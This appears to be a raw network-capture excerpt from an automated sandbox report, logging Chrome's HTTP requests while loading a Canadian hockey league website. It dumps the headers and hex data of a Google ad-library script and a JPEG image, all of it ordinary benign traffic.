                                                                                                                          2025-01-13 21:01:18 UTC7292INData Raw: 9f 75 9b 66 71 0a 9c 97 75 2d ad d3 2b 34 91 cd 21 29 04 e1 c0 00 e5 f9 49 07 c4 98 dc fd 18 d6 5a 4e b6 52 2a 97 1d bd 45 9e 92 a5 49 4f 99 09 77 a7 36 a5 c9 92 94 25 4a 5e c4 93 b0 0d c0 60 92 7e 48 b5 84 c6 d3 c4 c5 6d f2 9f 03 63 ca 7e 46 e3 b9 3b 88 ab 78 b9 50 8d ad 3d c9 a9 6e 5f f9 70 69 74 5f 71 e8 70 84 23 34 e3 c4 23 83 ae b6 cb 6b 79 e7 12 84 20 15 29 4a 38 09 03 a9 27 c0 46 ae df 7c 59 d5 ab 4e bd 2d a4 28 a7 4a d2 3d 52 66 6e 5e e1 a9 4b 2e 6d ea b3 4c 24 97 9c a5 d3 d0 b6 cb ed 24 0c 09 97 9d 69 a5 1f c5 87 93 ce 29 9c e3 4d 69 49 d9 17 f0 d8 5a d8 ca aa 8e 1e 2e 52 7c 17 f5 b9 71 7b 91 b4 91 58 d0 fa ae b6 6a fc 85 3a a9 72 fd da 6f 07 65 69 92 12 f5 2e d6 5a 8f 44 54 a3 ed b9 9c b6 db 26 54 95 29 18 4e e0 66 41 ef 82 0f 23 8f 43 b2 78 b3
                                                                                                                          Data Ascii: ufqu-+4!)IZNR*EIOw6%J^`~Hmc~F;xP=n_pit_qp#4#ky )J8'F|YN-(J=Rfn^K.mL$$i)MiIZ.R|q{Xj:roei.ZDT&T)NfA#Cx


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          78192.168.11.2049892172.253.63.1544431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:18 UTC662OUTGET /pagead/managed/js/gpt/m202501070101/pubads_impl.js HTTP/1.1
                                                                                                                          Host: securepubads.g.doubleclick.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEI1r3OARjBy8wB
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:18 UTC739INHTTP/1.1 200 OK
                                                                                                                          P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                          Timing-Allow-Origin: *
                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                          Server: cafe
                                                                                                                          Content-Length: 510147
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          Date: Mon, 13 Jan 2025 20:09:34 GMT
                                                                                                                          Expires: Tue, 13 Jan 2026 20:09:34 GMT
                                                                                                                          Cache-Control: public, immutable, max-age=31536000
                                                                                                                          ETag: 273197895018558538
                                                                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Age: 3104
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Connection: close
                                                                                                                          2025-01-13 21:01:18 UTC516INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 2f 2a 20 0a 20 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 20 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 20 0a 2a 2f 20 0a 2f 2a 20 0a 20 0a 20 43 6f 70 79 72 69 67 68 74 20 47 6f 6f 67 6c 65 20 4c 4c 43 20 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 20 0a 2a 2f 20 0a 2f 2a 20 0a 20 0a 20 0a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 35 2d 32 30 31 38 20 47 6f 6f 67 6c 65 2c 20 49 6e 63 2e 2c 20 4e 65 74 66 6c 69 78 2c 20 49 6e 63 2e 2c 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 2e 20 61 6e 64 20
                                                                                                                          Data Ascii: (function(_){/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0 */ /* Copyright Google LLC SPDX-License-Identifier: Apache-2.0 */ /* Copyright (c) 2015-2018 Google, Inc., Netflix, Inc., Microsoft Corp. and
                                                                                                                          2025-01-13 21:01:18 UTC1255INData Raw: 6c 69 63 61 62 6c 65 20 6c 61 77 20 6f 72 20 61 67 72 65 65 64 20 74 6f 20 69 6e 20 77 72 69 74 69 6e 67 2c 20 73 6f 66 74 77 61 72 65 20 0a 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4c 69 63 65 6e 73 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 6f 6e 20 61 6e 20 22 41 53 20 49 53 22 20 42 41 53 49 53 2c 20 0a 20 57 49 54 48 4f 55 54 20 57 41 52 52 41 4e 54 49 45 53 20 4f 52 20 43 4f 4e 44 49 54 49 4f 4e 53 20 4f 46 20 41 4e 59 20 4b 49 4e 44 2c 20 65 69 74 68 65 72 20 65 78 70 72 65 73 73 20 6f 72 20 69 6d 70 6c 69 65 64 2e 20 0a 20 53 65 65 20 74 68 65 20 4c 69 63 65 6e 73 65 20 66 6f 72 20 74 68 65 20 73 70 65 63 69 66 69 63 20 6c 61 6e 67 75 61 67 65 20 67 6f 76 65 72 6e 69 6e 67 20 70 65 72 6d 69 73 73 69 6f 6e 73 20
                                                                                                                          Data Ascii: licable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions
                                                                                                                          2025-01-13 21:01:18 UTC1255INData Raw: 6a 2c 56 6a 2c 58 6a 2c 59 6a 2c 62 6b 2c 61 6b 2c 64 6b 2c 66 6b 2c 67 6b 2c 69 6b 2c 6f 6b 2c 79 6b 2c 42 6b 2c 43 6b 2c 44 6b 2c 45 6b 2c 46 6b 2c 47 6b 2c 48 6b 2c 49 6b 2c 4b 6b 2c 4e 6b 2c 4c 6b 2c 51 6b 2c 4d 6b 2c 52 6b 2c 55 6b 2c 56 6b 2c 59 6b 2c 24 6b 2c 61 6c 2c 64 6c 2c 67 6c 2c 68 6c 2c 69 6c 2c 6a 6c 2c 6f 6c 2c 76 6c 2c 71 6c 2c 77 6c 2c 48 6c 2c 52 6c 2c 50 6c 2c 51 6c 2c 57 6c 2c 24 6c 2c 65 6d 2c 68 6d 2c 6a 6d 2c 6b 6d 2c 6c 6d 2c 6e 6d 2c 72 6d 2c 79 6d 2c 74 6d 2c 45 6d 2c 6f 6d 2c 47 6d 2c 48 6d 2c 4b 6d 2c 4d 6d 2c 52 6d 2c 55 6d 2c 56 6d 2c 52 2c 59 6d 2c 5a 6d 2c 24 6d 2c 6d 6e 2c 53 2c 6f 6e 2c 70 6e 2c 71 6e 2c 73 6e 2c 75 6e 2c 76 6e 2c 43 6e 2c 44 6e 2c 46 6e 2c 47 6e 2c 4c 6e 2c 53 6e 2c 55 6e 2c 57 6e 2c 58 6e 2c 59 6e 2c
                                                                                                                          Data Ascii: j,Vj,Xj,Yj,bk,ak,dk,fk,gk,ik,ok,yk,Bk,Ck,Dk,Ek,Fk,Gk,Hk,Ik,Kk,Nk,Lk,Qk,Mk,Rk,Uk,Vk,Yk,$k,al,dl,gl,hl,il,jl,ol,vl,ql,wl,Hl,Rl,Pl,Ql,Wl,$l,em,hm,jm,km,lm,nm,rm,ym,tm,Em,om,Gm,Hm,Km,Mm,Rm,Um,Vm,R,Ym,Zm,$m,mn,S,on,pn,qn,sn,un,vn,Cn,Dn,Fn,Gn,Ln,Sn,Un,Wn,Xn,Yn,
                                                                                                                          2025-01-13 21:01:18 UTC1255INData Raw: 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 5f 2e 74 2e 6e 61 76 69 67 61 74 6f 72 3b 72 65 74 75 72 6e 20 61 26 26 28 61 3d 61 2e 75 73 65 72 41 67 65 6e 74 29 3f 61 3a 22 22 7d 3b 66 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 64 61 3f 65 61 3f 65 61 2e 62 72 61 6e 64 73 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 28 62 3d 62 2e 62 72 61 6e 64 29 26 26 62 2e 69 6e 64 65 78 4f 66 28 61 29 21 3d 2d 31 7d 29 3a 21 31 3a 21 31 7d 3b 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 63 61 28 29 2e 69 6e 64 65 78 4f 66 28 61 29 21 3d 2d 31 7d 3b 6c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 61 3f 21 21 65 61 26 26 65 61 2e 62 72 61 6e 64 73 2e 6c 65 6e 67 74 68 3e 30 3a 21
                                                                                                                          Data Ascii: unction(){var a=_.t.navigator;return a&&(a=a.userAgent)?a:""};fa=function(a){return da?ea?ea.brands.some(function(b){return(b=b.brand)&&b.indexOf(a)!=-1}):!1:!1};ha=function(a){return ca().indexOf(a)!=-1};la=function(){return da?!!ea&&ea.brands.length>0:!
                                                                                                                          2025-01-13 21:01:18 UTC1255INData Raw: 65 74 75 72 6e 20 61 2e 67 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 22 29 3b 7d 3b 49 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 74 68 72 6f 77 20 45 72 72 6f 72 28 62 3d 3d 3d 76 6f 69 64 20 30 3f 22 75 6e 65 78 70 65 63 74 65 64 20 76 61 6c 75 65 20 22 2b 61 2b 22 21 22 3a 62 29 3b 7d 3b 4b 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 73 61 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 4a 61 28 62 3f 62 2e 63 72 65 61 74 65 53 63 72 69 70 74 28 61 29 3a 61 29 7d 3b 4c 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 4a 61 29 72 65 74 75 72 6e 20 61 2e 67 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 22 29 3b 7d 3b 4d 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 2c 63 3d 61 2e 6f 77 6e 65
                                                                                                                          Data Ascii: eturn a.g;throw Error("");};Ia=function(a,b){throw Error(b===void 0?"unexpected value "+a+"!":b);};Ka=function(a){var b=sa();return new Ja(b?b.createScript(a):a)};La=function(a){if(a instanceof Ja)return a.g;throw Error("");};Ma=function(a){var b,c=a.owne
                                                                                                                          2025-01-13 21:01:18 UTC1255INData Raw: 64 2c 66 29 7c 7c 28 64 5b 66 5d 3d 21 30 2c 61 5b 62 2b 2b 5d 3d 65 29 7d 61 2e 6c 65 6e 67 74 68 3d 62 7d 3b 61 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 73 6f 72 74 28 62 7c 7c 5f 2e 24 61 29 7d 3b 63 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 62 62 2c 63 3d 41 72 72 61 79 28 61 2e 6c 65 6e 67 74 68 29 2c 64 3d 30 3b 64 3c 61 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 63 5b 64 5d 3d 7b 69 6e 64 65 78 3a 64 2c 76 61 6c 75 65 3a 61 5b 64 5d 7d 3b 76 61 72 20 65 3d 62 7c 7c 5f 2e 24 61 3b 61 62 28 63 2c 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 65 28 66 2e 76 61 6c 75 65 2c 67 2e 76 61 6c 75 65 29 7c 7c 66 2e 69 6e 64 65 78 2d 67 2e 69 6e 64 65 78 7d 29 3b 66 6f 72 28 62 3d 30 3b 62 3c 61 2e 6c 65 6e
                                                                                                                          Data Ascii: d,f)||(d[f]=!0,a[b++]=e)}a.length=b};ab=function(a,b){a.sort(b||_.$a)};cb=function(a){for(var b=bb,c=Array(a.length),d=0;d<a.length;d++)c[d]={index:d,value:a[d]};var e=b||_.$a;ab(c,function(f,g){return e(f.value,g.value)||f.index-g.index});for(b=0;b<a.len
                                                                                                                          2025-01-13 21:01:18 UTC1255INData Raw: 2b 22 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 29 7d 29 2e 6a 6f 69 6e 28 22 26 22 29 2b 22 26 61 63 76 77 3d 5b 56 49 45 57 41 42 49 4c 49 54 59 5d 22 7d 3b 6f 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 21 31 3b 62 3d 62 3d 3d 3d 76 6f 69 64 20 30 3f 21 31 3a 62 3b 69 66 28 6c 62 29 7b 69 66 28 62 26 26 28 6d 62 3f 21 61 2e 69 73 57 65 6c 6c 46 6f 72 6d 65 64 28 29 3a 2f 28 3f 3a 5b 5e 5c 75 44 38 30 30 2d 5c 75 44 42 46 46 5d 7c 5e 29 5b 5c 75 44 43 30 30 2d 5c 75 44 46 46 46 5d 7c 5b 5c 75 44 38 30 30 2d 5c 75 44 42 46 46 5d 28 3f 21 5b 5c 75 44 43 30 30 2d 5c 75 44 46 46 46 5d 29 2f 2e 74 65 73 74 28 61 29 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 46 6f 75 6e 64 20 61 6e 20 75 6e 70 61 69 72 65 64 20 73
                                                                                                                          Data Ascii: +"="+encodeURIComponent(d)}).join("&")+"&acvw=[VIEWABILITY]"};ob=function(a){var b=!1;b=b===void 0?!1:b;if(lb){if(b&&(mb?!a.isWellFormed():/(?:[^\uD800-\uDBFF]|^)[\uDC00-\uDFFF]|[\uD800-\uDBFF](?![\uDC00-\uDFFF])/.test(a)))throw Error("Found an unpaired s
                                                                                                                          2025-01-13 21:01:18 UTC1255INData Raw: 77 20 45 72 72 6f 72 28 22 22 29 3b 7a 62 3d 66 75 6e 63 74 69 6f 6e 28 62 29 7b 5f 2e 74 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 28 62 29 7d 2c 30 29 7d 7d 3b 42 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 7a 62 29 74 72 79 7b 7a 62 28 61 29 7d 63 61 74 63 68 28 62 29 7b 74 68 72 6f 77 20 62 2e 63 61 75 73 65 3d 61 2c 62 3b 7d 7d 3b 44 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 45 72 72 6f 72 28 29 3b 43 62 28 61 2c 22 69 6e 63 69 64 65 6e 74 22 29 3b 7a 62 3f 42 62 28 61 29 3a 70 62 28 61 29 7d 3b 45 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 45 72 72 6f 72 28 61 29 3b 43 62 28 61 2c 22 77 61 72 6e 69 6e 67 22 29 3b 42 62 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 47 62 3d 66 75 6e 63 74 69 6f 6e
                                                                                                                          Data Ascii: w Error("");zb=function(b){_.t.setTimeout(function(){a(b)},0)}};Bb=function(a){if(zb)try{zb(a)}catch(b){throw b.cause=a,b;}};Db=function(){var a=Error();Cb(a,"incident");zb?Bb(a):pb(a)};Eb=function(a){a=Error(a);Cb(a,"warning");Bb(a);return a};Gb=function
                                                                                                                          2025-01-13 21:01:18 UTC1255INData Raw: 72 72 61 79 28 61 29 7c 7c 61 2e 6c 65 6e 67 74 68 3f 21 31 3a 28 30 2c 5f 2e 59 62 29 28 61 29 26 31 3f 21 30 3a 21 31 7d 3b 5f 2e 24 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 26 32 29 74 68 72 6f 77 20 45 72 72 6f 72 28 29 3b 7d 3b 61 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 74 79 70 65 6f 66 20 62 21 3d 3d 22 6e 75 6d 62 65 72 22 7c 7c 62 3c 30 7c 7c 62 3e 3d 61 2e 6c 65 6e 67 74 68 29 74 68 72 6f 77 20 45 72 72 6f 72 28 29 3b 7d 3b 62 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 74 79 70 65 6f 66 20 62 21 3d 3d 22 6e 75 6d 62 65 72 22 7c 7c 62 3c 30 7c 7c 62 3e 61 2e 6c 65 6e 67 74 68 29 74 68 72 6f 77 20 45 72 72 6f 72 28 29 3b 7d 3b 65 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 63 63 28 64 63
                                                                                                                          Data Ascii: rray(a)||a.length?!1:(0,_.Yb)(a)&1?!0:!1};_.$b=function(a){if(a&2)throw Error();};ac=function(a,b){if(typeof b!=="number"||b<0||b>=a.length)throw Error();};bc=function(a,b){if(typeof b!=="number"||b<0||b>a.length)throw Error();};ec=function(a){var b=cc(dc
                                                                                                                          2025-01-13 21:01:18 UTC1255INData Raw: 6e 67 28 62 29 29 3b 7d 65 6c 73 65 20 69 66 28 76 63 28 62 29 26 26 21 5f 2e 78 28 4e 75 6d 62 65 72 2c 22 69 73 53 61 66 65 49 6e 74 65 67 65 72 22 29 2e 63 61 6c 6c 28 4e 75 6d 62 65 72 2c 62 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 53 74 72 69 6e 67 28 62 29 29 3b 72 65 74 75 72 6e 20 77 63 3f 42 69 67 49 6e 74 28 61 29 3a 61 3d 78 63 28 61 29 3f 61 3f 22 31 22 3a 22 30 22 3a 74 63 28 61 29 3f 61 2e 74 72 69 6d 28 29 7c 7c 22 30 22 3a 53 74 72 69 6e 67 28 61 29 7d 3b 7a 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 2e 6c 65 6e 67 74 68 3e 62 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 21 31 3b 69 66 28 61 2e 6c 65 6e 67 74 68 3c 62 2e 6c 65 6e 67 74 68 7c 7c 61 3d 3d 3d 62 29 72 65 74 75 72 6e 21 30 3b 66 6f 72 28 76 61 72 20 63 3d 30 3b
                                                                                                                          Data Ascii: ng(b));}else if(vc(b)&&!_.x(Number,"isSafeInteger").call(Number,b))throw Error(String(b));return wc?BigInt(a):a=xc(a)?a?"1":"0":tc(a)?a.trim()||"0":String(a)};zc=function(a,b){if(a.length>b.length)return!1;if(a.length<b.length||a===b)return!0;for(var c=0;


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          79192.168.11.204989354.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:18 UTC678OUTGET /app/uploads/gthl/2024/12/19132310/33-waiting-for-the-pass-e1734632610661-730x427.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:18 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 47127
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:19 GMT
                                                                                                                          Last-Modified: Thu, 19 Dec 2024 18:23:33 GMT
                                                                                                                          ETag: "a94f77ccb534baa196549ec446c6b548"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 ec22576e88e707bf58c11e0ee75d019c.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: KQhkPmJLKIvoK5icP31GMB5p7EAcO0cA4iQQwSMeh7AkLHeKurDc9Q==
                                                                                                                          2025-01-13 21:01:18 UTC15897INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e1 00 58 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 02 01 3b 00 02 00 00 00 0f 00 00 00 26 82 98 00 02 00 00 00 19 00 00 00 36 00 00 00 00 47 6c 65 6e 6e 20 53 74 65 70 6c 6f 63 6b 00 00 32 30 32 33 0a 67 73 74 65 70 6c 6f 63 6b 40 67 6d 61 69 6c 2e 63 6f 6d 00 00 ff e2 01 d8 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 01 c8 6c 63 6d 73 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e2 00 03 00 14 00 09 00 0e 00 1d 61 63 73 70 4d 53 46 54 00 00 00 00 73 61 77 73 63 74 72 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 68 61 6e 64 9d 91 00 3d 40 80 b0 3d 40 74 2c 81 9e a5 22 8e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii: JFIFXExifMM*;&6Glenn Steplock2023gsteplock@gmail.comICC_PROFILElcmsmntrRGB XYZ acspMSFTsawsctrl-hand=@=@t,"
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: 3c 46 3f 72 ff 00 34 66 b5 98 5f 73 c9 bd bd 32 97 78 3e 2b d2 ed 33 56 de 93 03 f4 5e 79 2c 17 18 cf b8 f6 95 cb 3f 0e 71 08 f5 c4 cc d6 a3 13 fb c1 bc 79 a3 79 cf c5 84 9f b1 ee 1b 48 c0 ca 63 ad f5 ec c0 11 39 c5 71 cb 85 6a e0 e9 e3 97 d1 99 a9 c1 f7 25 12 bd a7 87 bb ee a2 ac a8 32 d1 cf 0c f2 e2 19 18 e6 3f 73 b0 36 91 83 95 9d b5 d8 30 c1 25 68 cb 8f f7 79 e0 7c d6 b3 fc 4b 54 5c ad da 3e 0a 3b 5d 1c 4d a3 ab 90 b6 aa 76 80 1d 1e dc 39 a0 1f 0c e0 fd 97 d8 70 9f 04 f1 0c ea 39 32 e4 f2 d3 fc 6f e9 fe 4f 3f 51 c4 31 42 d2 5c c7 37 3a 59 34 f6 a1 26 07 ef 75 0d 56 58 f6 72 0e c7 f5 07 e8 ba 82 d3 db 6e 9d b9 1a 66 32 f5 1c 72 ce d0 43 25 69 6e 0f 91 27 80 57 20 53 d6 bd af 79 df bb 18 01 c4 78 29 a1 a9 94 c5 8c 34 ed 27 39 5f a6 f1 1e 01 1d 74 63 79
                                                                                                                          Data Ascii: <F?r4f_s2x>+3V^y,?qyyHc9qj%2?s60%hy|KT\>;]Mv9p92oO?Q1B\7:Y4&uVXrnf2rC%in'W Syx)4'9_tcy
                                                                                                                          2025-01-13 21:01:18 UTC1495INData Raw: 48 5b 23 b3 ee c6 a5 8c 36 a6 f4 37 bc 7e 53 d0 2b ff 00 65 1a 4e 7d 27 a6 a1 b7 d4 3f 7b 99 c1 3e 05 5d db 18 68 e0 00 b0 58 d5 d9 9b cb 2e 86 2a dd 61 a6 a0 8d ac 82 26 b0 01 e0 16 43 d9 02 9b 38 49 bd 6c 35 1e c0 07 80 09 78 f2 4e e3 c9 23 b6 9e a1 42 09 ee 95 05 65 15 25 7c 26 1a a8 99 2c 67 c1 c1 4a 76 04 d3 33 5b f9 49 f9 20 28 17 bd 0d 45 0c f2 9a 1a 62 f2 f3 91 0e e0 01 cf a9 51 c1 a1 e9 5f 2d 5d 0c 4f 96 29 20 6e e6 90 46 0b 8b 41 f2 f5 c2 b6 5e 24 6c ed 0e 8b 7c 72 b3 d3 aa c3 4d 55 23 5d 34 ee 76 c7 4e 00 90 b4 1e 98 00 e3 ec b5 49 b8 b3 25 ba 31 5a 67 4a 3a e4 c9 4d 54 b2 40 1a 08 02 3c 79 9c 7e 81 49 5b d9 75 53 f7 7b 1e a2 a8 8b 20 f1 24 21 d8 fd 42 cc 50 6a 7b 65 b6 9f 61 12 6e ea ec 34 e1 3d fd a1 5a 18 70 5d 27 d5 ab 64 53 ad cc 5b dc d3
                                                                                                                          Data Ascii: H[#67~S+eN}'?{>]hX.*a&C8Il5xN#Be%|&,gJv3[I (EbQ_-]O) nFA^$l|rMU#]4vNI%1ZgJ:MT@<y~I[uS{ $!BPj{ean4=Zp]'dS[
                                                                                                                          2025-01-13 21:01:18 UTC1761INData Raw: 1b 4d 4e 69 f6 7f de 28 8c c3 7c 64 7e 61 b8 e4 83 fa 2d 03 5f 1c b6 fa 87 41 55 49 dd bd bd 5a 7c 3e aa fd 76 d0 97 bb 75 5b 26 9e e1 1d d4 54 72 65 86 73 50 e3 e7 bb 3c 8f ae 11 66 d0 b2 c9 71 0f ac a4 ad 8a 90 34 97 01 11 71 27 c9 a3 cc fa 9c 2c db 47 22 5b 1a e6 49 e0 2d 38 84 b4 91 c7 2a 3a 6d ad 23 79 25 b9 dc 5b 9e 09 0a fd da 3d 36 96 a3 a3 64 14 b6 eb b5 1d dc 11 b7 da 21 63 18 e6 78 b8 e0 93 95 0e 91 ec de ed a8 ad 02 b6 9a d8 c9 a1 91 c4 36 49 64 db d3 83 8f ae 52 e9 13 a9 57 a8 bb b6 a3 60 31 6d 6b 38 1b 7c 96 5e 86 ed 04 e7 bb a7 81 c2 62 31 bc f4 1e aa cd ff 00 62 d5 91 c9 18 b8 1a 4a 61 2b 8b 58 19 30 71 07 04 f2 33 d3 85 6d d3 bd 96 f7 94 2e a4 80 59 a4 2c 7e c7 cd dc ba 57 3f 18 3c 10 51 4a ca d1 af a9 ee 14 34 3b 22 75 53 4c 84 ee 2f eb
                                                                                                                          Data Ascii: MNi(|d~a-_AUIZ|>vu[&TresP<fq4q',G"[I-8*:m#y%[=6d!cx6IdRW`1mk8|^b1bJa+X0q3m.Y,~W?<QJ4;"uSL/
                                                                                                                          2025-01-13 21:01:18 UTC9000INData Raw: 43 40 f2 e3 09 c9 43 98 c0 55 56 d7 eb 4a d6 d7 5f ae 2d 7b d9 fb a6 34 e0 70 3c 07 a2 da 56 1d 51 0d e2 8d 96 c8 2d 36 db 7d 1d 0b 36 33 d8 84 81 cf 79 18 c3 c9 27 3d 09 5a c2 cb a7 ab 22 91 90 54 41 24 8c de 1c cc b0 90 1c 3c 3e aa fd 6b d2 1a 8a 8e 10 68 8f b1 87 e1 f2 17 80 49 23 a1 1f 42 b6 63 58 db 6a 4c d5 93 9d 57 2a 2b a2 0d 71 55 5a ca 86 d5 c1 0b 9d de 06 06 b9 a0 6d 1c 3b e6 16 53 4e 6b 1d 75 a3 a0 15 74 97 70 da 5a 32 63 ee 08 05 8f de 7a ed e8 ee 9d 56 7e 92 c1 70 64 32 41 57 5c f9 9e 1a e0 c2 c6 96 88 f7 75 c6 07 aa 81 9d 9e f7 94 ee 89 d5 f5 3b 1c 41 31 e0 86 13 e6 42 de a7 87 7d 8d 5c 99 6b 66 6e ce cb 6d 66 eb 4f 0e b2 ab ab a6 ae a9 b8 c6 65 dc c8 36 18 de 4e 1c 3a 9c 11 82 15 9f 54 c3 ed 10 c6 ef 10 1c d0 7c 41 23 23 f9 7e aa 8b d9 c5
                                                                                                                          Data Ascii: C@CUVJ_-{4p<VQ-6}63y'=Z"TA$<>khI#BcXjLW*+qUZm;SNkutpZ2czV~pd2AW\u;A1B}\kfnmfOe6N:T|A##~
